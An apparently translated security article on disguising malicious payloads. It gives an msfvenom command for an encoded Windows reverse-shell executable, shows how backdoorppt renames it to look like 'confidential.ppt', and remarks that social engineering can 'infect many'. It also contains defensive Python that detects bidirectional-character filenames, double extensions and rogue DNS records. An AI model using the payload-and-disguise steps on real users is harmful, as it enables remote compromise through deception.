Payload Camouflage (not every file is what it appears to be)

When we talk about camouflage, we think of people who do not want to be seen by others, whether to hide their identity or simply because they are not who they appear to be: what is seen is not what is there. The same thing happens in IT.

So, what is a payload? It is the set of data that is transmitted, the part that actually carries the message. It travels together with the headers or metadata that are sent to facilitate delivery of the message. In security, a payload is the code that takes advantage of a vulnerability, but the user has to execute it for that vulnerability to be exploited.

When these vulnerabilities appear in our systems, we must distinguish between the exploit and the payload: the exploit is what takes advantage of a vulnerability, while the payload is the code that is executed at that moment through the vulnerability.

Camouflaging a payload

Generally it is necessary to disguise it, because if the user notices a strange file he will not execute it; he will delete it or, in other cases, notify security staff about the appearance of that file or about someone's attempt to send him a strange file.

In general, camouflaging means making the information or file that you want to hide go unnoticed. It is important to know which tools exist to create a camouflaged payload; they are easy to find and readily available.

There are countless tools to create and camouflage payloads; three of them are listed below.

1. msfvenom, available in Hercules (the payload is created with it).

2. Metasploit framework.

3. Backdoorppt (the easiest to use as an example of camouflage).

Starting to camouflage a payload with backdoorppt

For this example, Debian GNU/Linux versions 8 and 9 are used to run this tool.

The first thing is to download it, since it is not available by default in any version of that distribution; we can obtain it with the following commands:

$ mkdir backdoorppt

$ cd backdoorppt

$ wget

Once we have the file on the PC and are in the console in the folder where we downloaded it, we proceed to the next step, which is to unzip it:

$ unzip

After this, a payload is generated (note that the following is an example command to generate it with Hercules/msfvenom); for this you must have msfvenom and Hercules running on the operating system.

$ msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST= LPORT=1234 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/documento.exe

The next step is to run backdoorppt with the following command as super user:

$ ./master/

$ sh master/

Note: if you use KDE as the graphical environment, before running it you must run the following command as a normal user:

$ xhost +

When it runs, it checks the necessary dependencies and, as it is adapted for standard systems, installs those needed for its operation. On other distributions, the dependencies must be installed manually.

Next it shows a window to select the executable file to be camouflaged; we choose it and click “OK” or “Open”. It then shows another window asking for the name we want to give to our camouflaged payload file; we give it a name, for example “confidential”, and click “Accept”.

This generates the camouflaged payload; if we look at it with the ls command, we see that its name and extension are:

$ ls

confidential? tpp.exe

And in the file explorer its name is “confidential.ppt”; it only takes a little social engineering and taking advantage of people’s curiosity, and you will be able to infect many in this way.
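The gap between what ls prints and what the file explorer shows is the whole trick, and it is also where a defender can catch it. The following checker is an added example, not code from the article or from the backdoorppt project. It assumes that the “?” in the ls output above stands for a Unicode bidirectional control character such as RIGHT-TO-LEFT OVERRIDE (U+202E), which makes a file manager draw the tail of the name reversed; it also goes a little beyond the article's case by flagging double extensions and files whose content is a Windows executable under a document extension. The sample names and header bytes are constructed for the demonstration.

```python
"""Flag files whose displayed name or type differs from what the OS will execute.

Added example (not from the article or the backdoorppt project). It assumes the
"?" shown by `ls` in the article stands for a Unicode bidirectional control
character such as RIGHT-TO-LEFT OVERRIDE (U+202E). Sample data is constructed.
"""
from pathlib import PurePath

# Unicode bidirectional formatting characters. Any of them can make a file name
# render in a different order than it is stored on disk.
BIDI_CONTROLS = {
    "\u202a": "LEFT-TO-RIGHT EMBEDDING",
    "\u202b": "RIGHT-TO-LEFT EMBEDDING",
    "\u202c": "POP DIRECTIONAL FORMATTING",
    "\u202d": "LEFT-TO-RIGHT OVERRIDE",
    "\u202e": "RIGHT-TO-LEFT OVERRIDE",
    "\u2066": "LEFT-TO-RIGHT ISOLATE",
    "\u2067": "RIGHT-TO-LEFT ISOLATE",
    "\u2068": "FIRST STRONG ISOLATE",
    "\u2069": "POP DIRECTIONAL ISOLATE",
}

# Extensions Windows runs directly when the file is double-clicked.
EXECUTABLE_EXTENSIONS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd",
                         ".js", ".jse", ".vbs", ".vbe", ".ps1", ".msi", ".hta"}


def render_with_rlo(name: str) -> str:
    """Approximate how a GUI draws the name: everything after a
    RIGHT-TO-LEFT OVERRIDE is displayed reversed until a POP DIRECTIONAL
    FORMATTING or the end of the string; other controls are invisible."""
    out, i = [], 0
    while i < len(name):
        ch = name[i]
        if ch == "\u202e":
            j, segment = i + 1, []
            while j < len(name) and name[j] != "\u202c":
                if name[j] not in BIDI_CONTROLS:
                    segment.append(name[j])
                j += 1
            out.extend(reversed(segment))
            i = j + 1  # skip the POP if one was found
        elif ch in BIDI_CONTROLS:
            i += 1
        else:
            out.append(ch)
            i += 1
    return "".join(out)


def inspect_name(name: str) -> dict:
    """Describe what a user sees versus what the operating system sees."""
    controls = [(i, BIDI_CONTROLS[ch]) for i, ch in enumerate(name) if ch in BIDI_CONTROLS]
    real_ext = PurePath(name).suffix.lower()
    visible = render_with_rlo(name)
    # "invoice.pdf.exe": the real extension vanishes when Explorer hides known ones.
    double_ext = len(PurePath(name).suffixes) > 1 and real_ext in EXECUTABLE_EXTENSIONS
    return {
        "stored_name": name,
        "displayed_name": visible,
        "real_extension": real_ext,
        "visible_extension": PurePath(visible).suffix.lower(),
        "bidi_controls": controls,
        "double_extension": double_ext,
        "executable": real_ext in EXECUTABLE_EXTENSIONS,
    }


def is_pe_image(head: bytes) -> bool:
    """Windows executables (PE) start with the 'MZ' DOS stub signature."""
    return head[:2] == b"MZ"


def assess(name: str, head: bytes) -> list:
    """Return the reasons a file deserves a closer look (empty list = nothing found)."""
    info = inspect_name(name)
    reasons = []
    if info["bidi_controls"]:
        reasons.append("name contains Unicode bidi control characters")
    if info["visible_extension"] != info["real_extension"]:
        reasons.append(f"displayed extension {info['visible_extension']!r} "
                       f"differs from real {info['real_extension']!r}")
    if info["double_extension"]:
        reasons.append("executable hidden behind a double extension")
    if is_pe_image(head) and not info["executable"]:
        reasons.append("content is a PE executable but the extension is not executable")
    return reasons


# Constructed samples: a name modelled on the article's output, a benign document,
# a double-extension trick, and a PE body stored under a document extension.
SAMPLES = [
    ("confidential\u202etpp.exe", b"MZ\x90\x00"),
    ("report.ppt", b"\xd0\xcf\x11\xe0"),
    ("invoice.pdf.exe", b"MZ\x90\x00"),
    ("slides.ppt", b"MZ\x90\x00"),
]

if __name__ == "__main__":
    for name, head in SAMPLES:
        shown = inspect_name(name)["displayed_name"]
        print(f"{shown!r:28} -> {assess(name, head) or ['ok']}")
```

Run it on the first few bytes and the raw (not rendered) name of incoming attachments; a mail gateway or a file-share scan that refuses names containing any BIDI_CONTROLS character, or whose visible extension disagrees with the real one, closes this particular disguise regardless of what the attacker named the file.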

Attacks on the network

Many times when surfing the net we go along unaware, and without knowing the different types of camouflage we could be facing an attack, given the different threats we encounter every day, which can put us in a serious situation when someone tries to breach our security. Although we often protect ourselves with security tools, there are attackers who are constantly studying new techniques to get malicious software onto your computer and compromise it.

As I have mentioned in this article, there are different types of camouflage. Among them is the domain camouflage attack, whose objective is to create panic in the user and take control of the domain of your website. Once the attacker has compromised your domain and has full access, he can register DNS records to create new subdomains, which gives him the advantage of evading blocking techniques based on lists of websites or IP addresses.

In short, with full access he can configure the entire network in his favour and control the domain, managing his attack, using his kit techniques and redirecting IP resolutions to addresses that belong to the attacker. Therefore, even if your domain is sound and has all the security measures in place, you should always be on the lookout and in constant vigilance so that attackers cannot use the different existing camouflages to access your domain.

However, if they do manage to access your domain, it can be considered dangerous and may be blocked, which would represent a serious problem. The attacker is usually very skilled: he can direct you to another level of subdomain and go from subdomain to subdomain until reaching the final one, which could end up in a highly malicious exploit.
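Because the attack described above works by quietly adding records to a zone the owner already controls, the most direct check is to compare the zone as it is now with a copy the administrators trust. The script below is an added example, not from the article. It assumes you keep a baseline export of the zone (for example a periodic download from the registrar or DNS provider) and a list of the address ranges the organisation legitimately uses; the zone lines, the subdomain names and the ranges are constructed for the demonstration.

```python
"""Report DNS records that appeared in a zone behind the owner's back.

Added example, not from the article. Assumes a trusted baseline export of the
zone and a list of address ranges the organisation owns; all data below is
constructed for the demonstration.
"""
import ipaddress

# Constructed baseline export (BIND-style "name TTL class type data").
BASELINE_ZONE = """\
www.example.org.    3600 IN A  192.0.2.10
mail.example.org.   3600 IN A  192.0.2.25
example.org.        3600 IN MX 10 mail.example.org.
"""

# Constructed later export: two records the administrators never created.
CURRENT_ZONE = """\
www.example.org.    3600 IN A  192.0.2.10
mail.example.org.   3600 IN A  192.0.2.25
example.org.        3600 IN MX 10 mail.example.org.
q7x1.example.org.   300  IN A  198.51.100.77
login-update.example.org. 300 IN A 198.51.100.78
"""

# Address ranges the organisation actually owns (constructed).
KNOWN_RANGES = [ipaddress.ip_network("192.0.2.0/24")]


def parse_zone(text: str) -> dict:
    """Return {(name, type): data} for each record line; skips blanks and comments."""
    records = {}
    for line in text.splitlines():
        line = line.split(";", 1)[0].strip()   # drop zone-file comments
        if not line:
            continue
        fields = line.split()
        if len(fields) < 5:
            continue                            # not "name ttl class type data"
        name, _ttl, _cls, rtype, *data = fields
        records[(name.lower().rstrip("."), rtype.upper())] = " ".join(data)
    return records


def outside_known_ranges(address: str) -> bool:
    """True if an A/AAAA target is not inside any range the organisation owns."""
    ip = ipaddress.ip_address(address)
    return not any(ip in net for net in KNOWN_RANGES)


def find_shadow_records(baseline_text: str, current_text: str) -> list:
    """Records present now but absent from (or changed since) the baseline,
    each as (name, type, data, note)."""
    baseline = parse_zone(baseline_text)
    current = parse_zone(current_text)
    findings = []
    for key, data in sorted(current.items()):
        if key in baseline and baseline[key] == data:
            continue
        name, rtype = key
        note = "new record" if key not in baseline else "changed record"
        if rtype in ("A", "AAAA") and outside_known_ranges(data):
            note += ", points outside known address ranges"
        findings.append((name, rtype, data, note))
    return findings


if __name__ == "__main__":
    for name, rtype, data, note in find_shadow_records(BASELINE_ZONE, CURRENT_ZONE):
        print(f"{name:28} {rtype:5} {data:18} {note}")
```

A new subdomain that resolves to an address outside the ranges you own is exactly the pattern the article warns about: the attacker uses your domain's reputation while the traffic ends up on his infrastructure. Running this comparison on every export, and alerting on any finding, turns the quiet registration into a visible event.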

Take into account, step by step, all the recommendations to prevent payload camouflage and to keep our systems and other equipment secure, so that an attacker cannot reach them through a domain. Knowing the risks a payload implies, a vulnerability that they manage to exploit would be fatal for our personal and business information, to which access must never be allowed. As they say, not all that glitters is gold, and so it is with the different existing camouflages and the new techniques that attackers keep studying to get past or into our systems without our security being able to detect them.
